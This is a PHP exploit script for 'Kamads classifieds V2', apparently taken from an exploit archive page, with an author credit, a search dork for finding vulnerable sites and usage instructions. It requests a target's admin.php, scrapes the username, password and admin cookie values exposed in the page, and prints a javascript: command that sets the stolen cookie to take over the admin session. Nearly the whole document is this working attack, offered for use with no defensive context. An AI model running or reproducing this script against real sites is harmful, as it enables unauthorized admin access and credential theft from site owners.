<?php if ($argc < 2) { echo "\n+-----------------------------------------------------------------+\n"; echo "| Kamads classifieds V2 Multiple Vulnerabilities |\n"; echo "| Author:Mr.tro0oqy |\n"; echo "| uxxd@hotmail.com |\n"; echo "| dork:inurl:V2A_XHTML |\n"; echo "| |\n"; echo "+-------------------------------------------------------------------+\n"; print "\nUsage........: php $argv[0] <host><path><admin.php>\n"; print "\nex...........: php $argv[0] http://www.target.com/V2A_XHTML/admin/admin.php\n"; die(); }else { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"$argv[1]"); $op1 = curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch,COOKIESESSION,true); curl_setopt($ch,CUSTOMREQUEST,"get"); $x = curl_exec($ch); if ($t = stristr($x,"username = ") and stristr($x,"password = ")) { echo "\n"; echo "\n"; echo $new = substr($t,0,94); if ($co=stristr($x,"theCookieName") and $co2=stristr($x,"theCookieValue")) { echo "\n"; echo "\n"; echo $new2 = substr($co,0,35); echo "\n"; echo $new3 =substr($co2,0,40); echo "\n"; echo "\n"; $ja = substr($new2,17,15); echo "\n"; $ja2 = substr($new3,18,18); echo "\n"; echo "\n"; echo "\n"; echo $exploit = "javascript:document.cookie=\"$ja=$ja2;path=/\";"; echo "\n"; echo "\n"; echo "\n"; } }else { echo "not found"; } } ?>Брой прочитания на тази страница: 1109
Kamads classifieds V2 Multiple Vulnerabilities